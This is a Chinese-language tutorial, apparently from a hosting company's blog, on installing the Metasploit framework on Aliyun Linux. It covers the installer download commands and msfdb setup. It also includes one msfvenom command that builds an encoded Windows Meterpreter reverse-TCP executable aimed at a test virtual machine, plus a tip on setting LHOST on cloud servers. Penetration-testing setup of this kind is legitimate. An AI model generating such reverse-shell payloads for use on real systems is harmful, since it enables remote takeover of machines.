您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關linux系統如何安裝msf,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
我的服務器系統是 Aliyun linux
1、下載安裝
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall可能報錯:Couldn’t open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
是因為安裝庫的問題!
解決方法:
yum install -y epel-release
然后再重復上面那條命令!2、添加新用戶運行msf
adduser msf #添加msf用戶
su msf #切換到msf用戶
cd /opt/metasploit-framework/bin #切換到msf所在的目錄
./msfconsole
#以后啟動msfconsole,都切換到msf用戶下啟動,這樣會同步數據庫。
如果使用root用戶啟動的話,不會同步數據庫!
(啟動索引已經默認配好了!)
直接 msfconsole 就可以啟動了!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | #相關命令 [msf@xxxx root]$ msf msfbinscan msfconsole msfd msfdb msfelfscan msfmachscan msfpescan msfrop msfrpc msfrpcd msfupdate msfvenom #數據庫初始化 [msf@xxxx root]$ msfdb Commands: init initialize the component reinit delete and reinitialize the component delete delete and stop the component status check component status start start the component stop stop the component restart restart the component |
1 2 3 4 5 | #測試: e.g.我的虛擬主機是 Win2003(目標機) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=msf_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > test.exe |
注:如果是彈性云服務器IP,LHOST 要設置為內網分配IP,不能設公網IP [被這個坑折騰好久!!!吐血!!!]
ps:linux系統下安裝msf框架
命令:
1 2 3 | wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run chmod 755 metasploit-latest-linux-installer.run ./metasploit-latest-linux-installer.run |
等待運行結束即可。關鍵地方按回車和Y即可。
關于“linux系統如何安裝msf”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。